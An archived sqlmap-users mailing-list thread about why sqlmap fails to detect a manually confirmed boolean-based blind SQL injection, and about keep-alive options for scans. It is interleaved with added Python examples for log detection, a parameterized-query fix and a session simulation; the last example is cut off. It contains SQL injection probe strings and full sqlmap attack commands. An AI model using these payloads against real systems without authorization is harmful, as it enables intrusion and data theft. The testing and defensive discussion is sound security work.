PackageSelection (returns response A)
PackageSelection' AND '1'='1 (returns response A)
PackageSelection' AND '1'='2 (returns response B)

In a nutshell, it doesn't appear to be trying single quotes and values
in the ' AND '1'='1 pattern. But I would have thought this is a pretty
typical format for checking boolean-based blind SQLi.

Cheers,

Alistair.

On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry <bpe...@gm...> wrote:
> It's a GET, so there wouldn't be a content type, unless I am mistaken.
>
> Alistair, have you tried --risk=3 with --level=5 yet?
>
> Sent from a phone
|
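From the defender's side, the probe values Alistair lists are exactly what a boolean-based blind test leaves behind in the web server's access log. The following is an added example, not part of the thread and not sqlmap code, that parses constructed Apache-style log lines modelled on those values, URL-decodes each query parameter, and flags a (client, path, parameter, base value) group that received both a true and a false comparison. The log lines, client addresses and regular expressions are assumptions; the probe pattern deliberately covers both the numeric `AND 1631=1631` shape sqlmap sent and the quoted `' AND '1'='1` shape from the manual test, since either one can appear.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (abbreviated Apache combined format) modelled on the
# probe values quoted in this thread. These are not real logs from the application.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2015:13:01:02 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1" 200 5120
10.0.0.5 - - [28/Apr/2015:13:01:03 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%29%20AND%201477%3D7114 HTTP/1.1" 200 4870
10.0.0.5 - - [28/Apr/2015:13:01:03 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%29%20AND%201631%3D1631 HTTP/1.1" 200 4870
10.0.0.5 - - [28/Apr/2015:13:01:04 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27%20AND%203943%3D9381 HTTP/1.1" 200 4870
10.0.0.5 - - [28/Apr/2015:13:01:04 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27%20AND%201631%3D1631 HTTP/1.1" 200 4870
10.0.0.5 - - [28/Apr/2015:13:01:05 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27%20AND%20%271%27%3D%272 HTTP/1.1" 200 3900
10.0.0.9 - - [28/Apr/2015:13:02:00 +0000] "GET /help/UserGuide.aspx?Sec=Billing HTTP/1.1" 200 5210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<size>\d+)'
)

# A boolean probe: the original value, optional closing quote/parenthesis characters,
# AND, then either N=M (numeric) or 'N'='M (quoted); anything after that is ignored.
PROBE_RE = re.compile(
    r"""^(?P<base>.*?)[)'"]*\s+AND\s+(?:(?P<ln>\d+)\s*=\s*(?P<rn>\d+)|'(?P<lq>\d+)'\s*=\s*'(?P<rq>\d+))""",
    re.IGNORECASE,
)


def classify_probe(value):
    """Return (base value, comparison is true) if value looks like a boolean probe, else None."""
    m = PROBE_RE.match(value)
    if not m:
        return None
    left = m.group("ln") or m.group("lq")
    right = m.group("rn") or m.group("rq")
    return m.group("base"), left == right


def parse_line(line):
    """Split one log line into its fields plus the decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)  # also URL-decodes
    return rec


def find_boolean_probes(log_text):
    """Group probe values by (client, path, parameter, base value) and count how many
    true and false comparisons each group received."""
    seen = defaultdict(lambda: {"true": 0, "false": 0, "samples": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            probe = classify_probe(value)
            if probe is None:
                continue
            base, truth = probe
            entry = seen[(rec["ip"], rec["path"], name, base)]
            entry["true" if truth else "false"] += 1
            entry["samples"].append(value)
    return dict(seen)


def suspicious_keys(log_text):
    """Groups that saw both a true and a false comparison: a differential test, not a stray value."""
    return sorted(k for k, v in find_boolean_probes(log_text).items() if v["true"] and v["false"])


if __name__ == "__main__":
    for key, info in find_boolean_probes(SAMPLE_LOG).items():
        flag = "PROBE PAIR" if info["true"] and info["false"] else "single"
        print(flag, key, "true=%d false=%d" % (info["true"], info["false"]))
```

Grouping on the base value is what separates a test from noise: a lone `AND 1=1` in a search box is weak evidence, but the same client sending both a tautology and a contradiction against the same parameter, as in the list above, is the signature of a differential check, and on a GET request the values sit in the log unencrypted and untruncated.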
From: Brandon P. <bpe...@gm...> - 2015-04-28 12:36:44
|
It's a GET, so there wouldn't be a content type, unless I am mistaken.

Alistair, have you tried --risk=3 with --level=5 yet?

Sent from a phone

> On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <mir...@gm...> wrote:
>
> Can you please send the unredacted content of request.txt to my address?
>
> If not, then please at least send me the content of traffic file which you can obtain by just appending the "-t traffic.txt" to the regular sqlmap's run.
>
> Bye
|
From: Miroslav S. <mir...@gm...> - 2015-04-28 12:13:34
|
Can you please send the unredacted content of request.txt to my address?

If not, then please at least send me the content of traffic file which
you can obtain by just appending the "-t traffic.txt" to the regular
sqlmap's run.

Bye

On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...> wrote:
> Thanks for the quick reply.
>
> The contents of the request file are as follows:
>
> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> Host: <redacted>
> Accept: */*
> Accept-Language: en
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
> Connection: close
> Referer: <redacted>
> Cookie: <redacted>
>
> I've redacted some of the details as it's not appropriate to draw
> attention to an internet-facing application's SQLi vulnerability.
>
> When providing the request file as part of the following command:
>
> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1
>
> sqlmap executes as normal but cannot identify (and therefore cannot
> exploit) the boolean-based blind vulnerability which I've verified
> manually.
>
> Thanks again,
>
> Al.

--
Miroslav Stampar
http://about.me/stamparm
|
From: Alistair J. <amc...@gm...> - 2015-04-28 12:10:12
|
Thanks for the quick reply. The contents of the request file are as follows: GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1 Host: <redacted> Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: <redacted> Cookie: <redacted> I've redacted some of the details as it's not appropriate to draw attention to an internet facing application's SQLi vulnerability. When providing the request file as part of the following command: sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1 sqlmap executes as normal but cannot identify (and therefore cannot exploit) the boolean-based blind vulnerability which I've verified manually. Thanks again, Al. On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar <mir...@gm...> wrote: > And what is the content of request file? > > Bye > > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...> > wrote: >> >> Hi sqlmappers, >> >> I'm a fairly experienced user of sqlmap having used it extensively in >> the past. I came across what appeared to pretty typical boolean-based >> blind SQLi in an application I'm (legally) testing. However, for the >> first time, I'm unable to get sqlmap to recognise the parameter as >> vulnerable to exploit it further. And as we know, manually exploiting >> blind SQLi is cumbersome to say the least. >> >> Here is a summary of the requests i've made to manually confirm the >> vulnerability. 
>> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A) >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A) >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B) >> >> I've tried various sqlmap flags and thought the following command >> would give me the best chance of success: >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string >> 'industries' -v 1 >> >> Note: the string 'industries' is text that appears in response A but >> not response B. >> >> I've looked at the requests that sqlmap is sending in the background >> (proxied through burp). It appears that it's attempting to exploit >> this with the AND statement as it should but is not using single >> quotes as per my example above. >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be >> more than happy to contribute some time to improve it so it can >> identify injectable parameters such as these in the future. >> >> Thanks, >> >> Al. > -- > Miroslav Stampar > http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2015-04-28 11:59:27
|
And what is the content of request file? Bye On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...> wrote: > Hi sqlmappers, > > I'm a fairly experienced user of sqlmap having used it extensively in > the past. I came across what appeared to pretty typical boolean-based > blind SQLi in an application I'm (legally) testing. However, for the > first time, I'm unable to get sqlmap to recognise the parameter as > vulnerable to exploit it further. And as we know, manually exploiting > blind SQLi is cumbersome to say the least. > > Here is a summary of the requests i've made to manually confirm the > vulnerability. > > /help/UserGuide.aspx?Sec=PackageSelection (returns response A) > /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A) > /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B) > > I've tried various sqlmap flags and thought the following command > would give me the best chance of success: > > sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' > --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string > 'industries' -v 1 > > Note: the string 'industries' is text that appears in response A but > not response B. > > I've looked at the requests that sqlmap is sending in the background > (proxied through burp). It appears that it's attempting to exploit > this with the AND statement as it should but is not using single > quotes as per my example above. > > I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd be > more than happy to contribute some time to improve it so it can > identify injectable parameters such as these in the future. > > Thanks, > > Al. 
> -- Miroslav Stampar http://about.me/stamparm |
From: Alistair J. <amc...@gm...> - 2015-04-28 11:03:52
|
Hi sqlmappers,

I'm a fairly experienced user of sqlmap, having used it extensively in the past. I came across what appeared to be pretty typical boolean-based blind SQLi in an application I'm (legally) testing. However, for the first time, I'm unable to get sqlmap to recognise the parameter as vulnerable and exploit it further. And as we know, manually exploiting blind SQLi is cumbersome to say the least.

Here is a summary of the requests I've made to manually confirm the vulnerability.

/help/UserGuide.aspx?Sec=PackageSelection (returns response A)
/help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
/help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)

I've tried various sqlmap flags and thought the following command would give me the best chance of success:

sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1

Note: the string 'industries' is text that appears in response A but not response B.

I've looked at the requests that sqlmap is sending in the background (proxied through Burp). It appears that it's attempting to exploit this with the AND statement as it should, but is not using single quotes as per my example above.

I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be more than happy to contribute some time to improve it so it can identify injectable parameters such as these in the future.

Thanks,

Al. |
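An added example (my own code, not the application from this thread and not sqlmap): a sqlite-backed stand-in for the Sec lookup reproduces the response A / response B behaviour of the three requests above when the query is built by string concatenation, and shows that the same three requests stop acting as a boolean oracle once the value is bound as a parameter. The table, its columns and the page text containing 'industries' are assumptions.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed stand-in for the lookup behind /help/UserGuide.aspx?Sec=...;
# the real application's schema is not on the list, so this table is an assumption.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE help_sections (name TEXT, body TEXT)")
    conn.execute(
        "INSERT INTO help_sections VALUES "
        "('PackageSelection', 'Choose the packages that fit your industries.')"
    )
    conn.commit()
    return conn

def sec_from_url(url):
    """Decode the Sec value the way the server sees it ('+' becomes a space)."""
    return parse_qs(urlsplit(url).query)["Sec"][0]

def render_vulnerable(conn, sec):
    """String-concatenated query: the quote inside sec closes the SQL literal,
    so the rest of the value becomes SQL and decides whether a row comes back."""
    sql = "SELECT body FROM help_sections WHERE name = '" + sec + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else "Section not found"

def render_parameterized(conn, sec):
    """Bound parameter: the whole value is compared as data, quotes included."""
    row = conn.execute(
        "SELECT body FROM help_sections WHERE name = ?", (sec,)
    ).fetchone()
    return row[0] if row else "Section not found"

def boolean_oracle_present(conn, render, marker="industries"):
    """Replay the three requests from the thread. The parameter behaves as a
    boolean oracle when the marker is in the base and '1'='1' responses
    (response A) but absent from the '1'='2' response (response B)."""
    base = sec_from_url("/help/UserGuide.aspx?Sec=PackageSelection")
    true_probe = sec_from_url("/help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1")
    false_probe = sec_from_url("/help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2")
    responses = [render(conn, value) for value in (base, true_probe, false_probe)]
    seen = [marker in response for response in responses]
    return seen == [True, True, False]

if __name__ == "__main__":
    db = make_db()
    print("concatenated query, oracle present:", boolean_oracle_present(db, render_vulnerable))
    print("parameterized query, oracle present:", boolean_oracle_present(db, render_parameterized))
```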
From: Miroslav S. <mir...@gm...> - 2015-04-22 14:29:40
|
Please update to the latest revision and use: --safe-req=...req.txt --safe-freq=... Bye On Wed, Apr 22, 2015 at 3:08 PM, Vojtěch Polášek <kr...@gm...> wrote: > Well, so if I understand it right. Currently, --safe-url receives the URL > to which the post request is going to be sent. > --safe-post receives *only* POST data, no HTTP headers etc. > There is no possibility to send some specific cookies or other HTTP > headers currently with this safe thing. Am I right? > Thanks for clarification. I am sorry if my description of problem wasn't > exact enough. > Vojta > > On 22.4.2015 14:52, Miroslav Stampar wrote: > > I'll just repeat a sentence from your original message: > > "Is there any possibility to supply a post request to safeurl?" > > Bye > > On Wed, Apr 22, 2015 at 2:29 PM, Vojtěch Polášek <kr...@gm...> > wrote: > >> Hi, >> I tried your new --safe-post and it doesn't seem to fullfill my needs. I >> need to submit in this url same cookies as in requests for SQL injection >> etc. Would it be possible to provide something like --safe-request and read >> request from a file? >> Thanks, >> Vojta >> >> >> On 20.4.2015 23:56, Miroslav Stampar wrote: >> >> Done (usage e.g. --safe-url=... --safe-post="foo=bar&..."). >> >> Bye >> >> On Mon, Apr 20, 2015 at 10:26 PM, Miroslav Stampar < >> mir...@gm...> wrote: >> >>> Pushing the patch in couple of hours. >>> >>> Bye >>> >>> On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry < >>> bpe...@gm...> wrote: >>> >>>> Ah, good point. Hadn't thought about that. Also, requiring a POST >>>> request does make it difficult. >>>> >>>> On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe <hoo...@gm...> >>>> wrote: >>>> >>>>> I dont think second order option will work as that is specifiing >>>>> where to look for injection results, which might result in your underlying >>>>> injection failing if the results are not to be found there. 
>>>>> >>>>> There is however options in latest version that appear to be for just >>>>> this type of situation (although I personally haven't used them just yet): >>>>> --safe-url=SAFURL URL address to visit frequently during testing >>>>> --safe-freq=SAFREQ Test requests between two visits to a given >>>>> safe URL >>>>> >>>>> I believe this will ensure your session remains active during scan. >>>>> >>>>> There is also the options for CSRF tokens to be snagged and parsed via: >>>>> --csrf-token=CSR.. Parameter used to hold anti-CSRF token >>>>> --csrf-url=CSRFURL URL address to visit to extract anti-CSRF token >>>>> >>>>> In case the csrf token needs to be refreshed for each injection (when >>>>> injecting into forms and other typical POST injections and such). >>>>> >>>>> On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry < >>>>> bpe...@gm...> wrote: >>>>> >>>>>> However, that being said, I have run into this before and had to >>>>>> write my own exploits to fully exploit the vulnerability. >>>>>> >>>>>> On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry < >>>>>> bpe...@gm...> wrote: >>>>>> >>>>>>> There is a second order parameter, it could be used to perform this. >>>>>>> It would be requested after ever injected request were sent. >>>>>>> >>>>>>> On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...> >>>>>>> wrote: >>>>>>> >>>>>>>> Greetings, >>>>>>>> I am testing an application which I suspect to log me out if I don't >>>>>>>> send certain post request in certain time interval. >>>>>>>> Is this possible to do with Sqlmap? I know that there is a parameter >>>>>>>> which lets me to run any python code before every request. But it >>>>>>>> is not >>>>>>>> so nice, let's say. >>>>>>>> Is there any possibility to supply a post request to safeurl? Is >>>>>>>> there >>>>>>>> anything like this planed? 
>>>>>>>> Thank you very much, >>>>>>>> Vojta -- Miroslav Stampar http://about.me/stamparm |
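An added example (my own code, not sqlmap's and not Vojtěch's application) for the --safe-req / --safe-freq scheme settled on in this thread: a parser for the raw request file format that --safe-req reads, a constructed fake application that logs the session out after a number of idle requests, and a scan loop showing that the keep-alive request only works when it is sent often enough and carries the same Cookie header as the scan traffic, which --safe-url plus --safe-post alone could not send. The /keepalive path, the idle limit, the cookie value and my reading of --safe-freq's ordering are assumptions.

```python
from dataclasses import dataclass

COOKIE = "ASPSESSID=abc123"  # constructed session cookie, not a real value

@dataclass
class RawRequest:
    method: str
    path: str
    headers: dict
    body: str

def parse_raw_request(text):
    """Parse a Burp-style raw HTTP request, the file format sqlmap reads
    with -r and --safe-req, into method, path, headers and body."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path = request_line.split()[:2]
    headers = {}
    for line in header_lines:
        if line.strip():
            name, _, value = line.partition(":")
            headers[name.strip()] = value.strip()
    return RawRequest(method, path, headers, body.strip())

class FakeApp:
    """Constructed stand-in for the application under test (not the real one
    from the thread): the session survives idle_limit consecutive requests, and
    only a POST to /keepalive that carries the session cookie resets the count."""

    def __init__(self, idle_limit, session_cookie=COOKIE):
        self.idle_limit = idle_limit
        self.session_cookie = session_cookie
        self.idle = 0
        self.logged_in = True

    def handle(self, req):
        if not self.logged_in or req.headers.get("Cookie") != self.session_cookie:
            return "login page"
        if req.method == "POST" and req.path == "/keepalive":
            self.idle = 0
            return "ok"
        self.idle += 1
        if self.idle > self.idle_limit:
            self.logged_in = False
            return "login page"
        return "app page"

def run_scan(app, test_requests, safe_request=None, safe_freq=0):
    """Send the test requests in order and, after every safe_freq of them, the
    safe request (my reading of --safe-freq; sqlmap's exact ordering is an
    assumption). Returns how many test requests reached the app still logged in."""
    served = 0
    for i, req in enumerate(test_requests, 1):
        if app.handle(req) == "app page":
            served += 1
        if safe_request is not None and safe_freq and i % safe_freq == 0:
            app.handle(safe_request)
    return served

# Constructed safe request in --safe-req file form; it carries the same
# Cookie header as the scan traffic.
SAFE_REQ = (
    "POST /keepalive HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Cookie: " + COOKIE + "\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "ping=1\r\n"
)

def make_test_requests(n):
    """n constructed scanner requests, all carrying the session cookie."""
    return [
        RawRequest("GET", "/page.aspx?id=%d" % i,
                   {"Host": "app.example", "Cookie": COOKIE}, "")
        for i in range(n)
    ]

if __name__ == "__main__":
    safe = parse_raw_request(SAFE_REQ)
    print("no safe request:         ", run_scan(FakeApp(5), make_test_requests(20)))
    print("--safe-freq=3 with cookie:", run_scan(FakeApp(5), make_test_requests(20), safe, 3))
    print("--safe-freq=6 (too rare): ", run_scan(FakeApp(5), make_test_requests(20), safe, 6))
```

The third run shows the cadence matters: a safe request sent less often than the application's idle limit arrives after the session is already gone.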
From: Miroslav S. <mir...@gm...> - 2015-04-22 13:37:58
|
I'll just repeat a sentence from your original message: "Is there any possibility to supply a post request to safeurl?" Bye On Wed, Apr 22, 2015 at 2:29 PM, Vojtěch Polášek <kr...@gm...> wrote: > Hi, > I tried your new --safe-post and it doesn't seem to fullfill my needs. I > need to submit in this url same cookies as in requests for SQL injection > etc. Would it be possible to provide something like --safe-request and read > request from a file? > Thanks, > Vojta > > > On 20.4.2015 23:56, Miroslav Stampar wrote: > > Done (usage e.g. --safe-url=... --safe-post="foo=bar&..."). > > Bye > > On Mon, Apr 20, 2015 at 10:26 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> Pushing the patch in couple of hours. >> >> Bye >> >> On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry <bpe...@gm... >> > wrote: >> >>> Ah, good point. Hadn't thought about that. Also, requiring a POST >>> request does make it difficult. >>> >>> On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe <hoo...@gm...> >>> wrote: >>> >>>> I dont think second order option will work as that is specifiing >>>> where to look for injection results, which might result in your underlying >>>> injection failing if the results are not to be found there. >>>> >>>> There is however options in latest version that appear to be for just >>>> this type of situation (although I personally haven't used them just yet): >>>> --safe-url=SAFURL URL address to visit frequently during testing >>>> --safe-freq=SAFREQ Test requests between two visits to a given >>>> safe URL >>>> >>>> I believe this will ensure your session remains active during scan. >>>> >>>> There is also the options for CSRF tokens to be snagged and parsed via: >>>> --csrf-token=CSR.. Parameter used to hold anti-CSRF token >>>> --csrf-url=CSRFURL URL address to visit to extract anti-CSRF token >>>> >>>> In case the csrf token needs to be refreshed for each injection (when >>>> injecting into forms and other typical POST injections and such). 
>>>> >>>> On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry < >>>> bpe...@gm...> wrote: >>>> >>>>> However, that being said, I have run into this before and had to write >>>>> my own exploits to fully exploit the vulnerability. >>>>> >>>>> On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry < >>>>> bpe...@gm...> wrote: >>>>> >>>>>> There is a second order parameter, it could be used to perform this. >>>>>> It would be requested after ever injected request were sent. >>>>>> >>>>>> On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...> >>>>>> wrote: >>>>>> >>>>>>> Greetings, >>>>>>> I am testing an application which I suspect to log me out if I don't >>>>>>> send certain post request in certain time interval. >>>>>>> Is this possible to do with Sqlmap? I know that there is a parameter >>>>>>> which lets me to run any python code before every request. But it is >>>>>>> not >>>>>>> so nice, let's say. >>>>>>> Is there any possibility to supply a post request to safeurl? Is >>>>>>> there >>>>>>> anything like this planed? >>>>>>> Thank you very much, >>>>>>> Vojta >>>>>>> >>>>>>> >>>>>>> ------------------------------------------------------------------------------ >>>>>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT >>>>>>> Develop your own process in accordance with the BPMN 2 standard >>>>>>> Learn Process modeling best practices with Bonita BPM through live >>>>>>> exercises >>>>>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- >>>>>>> event?utm_ >>>>>>> >>>>>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF >>>>>>> _______________________________________________ >>>>>>> sqlmap-users mailing list >>>>>>> sql...@li... 
-- Miroslav Stampar http://about.me/stamparm |
From: Vojtěch P. <kr...@gm...> - 2015-04-22 13:08:23
|
Well, so if I understand it right. Currently, --safe-url receives the URL to which the post request is going to be sent. --safe-post receives *only* POST data, no HTTP headers etc. There is no possibility to send some specific cookies or other HTTP headers currently with this safe thing. Am I right? Thanks for clarification. I am sorry if my description of problem wasn't exact enough. Vojta On 22.4.2015 14:52, Miroslav Stampar wrote: > I'll just repeat a sentence from your original message: > > "Is there any possibility to supply a post request to safeurl?" > > Bye > > On Wed, Apr 22, 2015 at 2:29 PM, Vojtěch Polášek <kr...@gm... > <mailto:kr...@gm...>> wrote: > > Hi, > I tried your new --safe-post and it doesn't seem to fullfill my > needs. I need to submit in this url same cookies as in requests > for SQL injection etc. Would it be possible to provide something > like --safe-request and read request from a file? > Thanks, > Vojta > > > On 20.4.2015 23:56, Miroslav Stampar wrote: >> Done (usage e.g. --safe-url=... --safe-post="foo=bar&..."). >> >> Bye >> >> On Mon, Apr 20, 2015 at 10:26 PM, Miroslav Stampar >> <mir...@gm... <mailto:mir...@gm...>> >> wrote: >> >> Pushing the patch in couple of hours. >> >> Bye >> >> On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry >> <bpe...@gm... >> <mailto:bpe...@gm...>> wrote: >> >> Ah, good point. Hadn't thought about that. Also, >> requiring a POST request does make it difficult. >> >> On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe >> <hoo...@gm... <mailto:hoo...@gm...>> wrote: >> >> I dont think second order option will work as that is >> specifiing where to look for injection results, which >> might result in your underlying injection failing if >> the results are not to be found there. 
>> >> There is however options in latest version that >> appear to be for just this type of situation >> (although I personally haven't used them just yet): >> --safe-url=SAFURL URL address to visit >> frequently during testing >> --safe-freq=SAFREQ Test requests between two >> visits to a given safe URL >> >> I believe this will ensure your session remains >> active during scan. >> >> There is also the options for CSRF tokens to be >> snagged and parsed via: >> --csrf-token=CSR.. Parameter used to hold >> anti-CSRF token >> --csrf-url=CSRFURL URL address to visit to >> extract anti-CSRF token >> >> In case the csrf token needs to be refreshed for each >> injection (when injecting into forms and other >> typical POST injections and such). >> >> On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry >> <bpe...@gm... >> <mailto:bpe...@gm...>> wrote: >> >> However, that being said, I have run into this >> before and had to write my own exploits to fully >> exploit the vulnerability. >> >> On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry >> <bpe...@gm... >> <mailto:bpe...@gm...>> wrote: >> >> There is a second order parameter, it could >> be used to perform this. It would be >> requested after ever injected request were sent. >> >> On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch >> Polášek <kr...@gm... >> <mailto:kr...@gm...>> wrote: >> >> Greetings, >> I am testing an application which I >> suspect to log me out if I don't >> send certain post request in certain time >> interval. >> Is this possible to do with Sqlmap? I >> know that there is a parameter >> which lets me to run any python code >> before every request. But it is not >> so nice, let's say. >> Is there any possibility to supply a post >> request to safeurl? Is there >> anything like this planed? 
>> Thank you very much, >> Vojta |
From: Vojtěch P. <kr...@gm...> - 2015-04-22 12:29:58
|
Hi,
I tried your new --safe-post and it doesn't seem to fulfill my needs. I need to submit in this URL the same cookies as in the requests for SQL injection etc. Would it be possible to provide something like --safe-request and read the request from a file?
Thanks,
Vojta

On 20.4.2015 23:56, Miroslav Stampar wrote:
> Done (usage e.g. --safe-url=... --safe-post="foo=bar&...").
>
> Bye
>
> On Mon, Apr 20, 2015 at 10:26 PM, Miroslav Stampar <mir...@gm...> wrote:
>> Pushing the patch in a couple of hours.
>>
>> Bye
>>
>> On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry <bpe...@gm...> wrote:
>>> Ah, good point. Hadn't thought about that. Also, requiring a POST request does make it difficult.
>>>
>>> On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe <hoo...@gm...> wrote:
>>>> I don't think the second order option will work, as that is specifying where to look for injection results, which might result in your underlying injection failing if the results are not to be found there.
>>>>
>>>> There are, however, options in the latest version that appear to be for just this type of situation (although I personally haven't used them just yet):
>>>>   --safe-url=SAFURL   URL address to visit frequently during testing
>>>>   --safe-freq=SAFREQ  Test requests between two visits to a given safe URL
>>>>
>>>> I believe this will ensure your session remains active during the scan.
>>>>
>>>> There are also options for CSRF tokens to be snagged and parsed via:
>>>>   --csrf-token=CSR..  Parameter used to hold anti-CSRF token
>>>>   --csrf-url=CSRFURL  URL address to visit to extract anti-CSRF token
>>>>
>>>> in case the CSRF token needs to be refreshed for each injection (when injecting into forms and other typical POST injections and such).
>>>>
>>>> On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry <bpe...@gm...> wrote:
>>>>> However, that being said, I have run into this before and had to write my own exploits to fully exploit the vulnerability.
>>>>>
>>>>> On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry <bpe...@gm...> wrote:
>>>>>> There is a second order parameter; it could be used to perform this. It would be requested after every injected request was sent.
>>>>>>
>>>>>> On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...> wrote:
>>>>>>> Greetings,
>>>>>>> I am testing an application which I suspect logs me out if I don't send a certain POST request within a certain time interval.
>>>>>>> Is this possible to do with Sqlmap? I know that there is a parameter which lets me run any Python code before every request. But it is not so nice, let's say.
>>>>>>> Is there any possibility to supply a POST request to safeurl? Is there anything like this planned?
>>>>>>> Thank you very much,
>>>>>>> Vojta
>
> --
> Miroslav Stampar
> http://about.me/stamparm

------------------------------------------------------------------------------
BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
Develop your own process in accordance with the BPMN 2 standard
Learn Process modeling best practices with Bonita BPM through live exercises
http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-event?utm_source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
_______________________________________________
sqlmap-users mailing list
sql...@li...
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
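The keep-alive problem the thread is about, as an added example that is not part of the original messages and not sqlmap's own code: a toy target drops the session unless a specific POST arrives often enough, and a scanner has to interleave that request with its injection probes using the same session cookie the probes use (which is what --safe-url/--safe-post/--safe-freq address, and why the cookie question above matters). The raw-request parser reads the "request line, headers, blank line, body" layout that sqlmap's -r option takes. Assumptions: the server counts requests rather than wall-clock time, and the request file, host name and cookie name are constructed for this example.

```python
"""
Added example (not sqlmap code): why a safe request must share the scan's session.
Target, scanner loop and the raw request file below are all constructed here;
the server counts requests instead of time (simplification).
"""
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed raw HTTP request in the style of a file passed to -r.
SAFE_REQUEST_FILE = """\
POST /keepalive HTTP/1.1
Host: target.example
Cookie: PHPSESSID=abc123
Content-Type: application/x-www-form-urlencoded

ping=1
"""


@dataclass
class RawRequest:
    method: str
    path: str
    headers: Dict[str, str]
    body: str


def parse_raw_request(text: str) -> RawRequest:
    """Split a raw HTTP request into method, path, lower-cased headers and body."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split()
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        if name.strip():
            headers[name.strip().lower()] = value.strip()
    return RawRequest(method, path, headers, body.rstrip("\n"))


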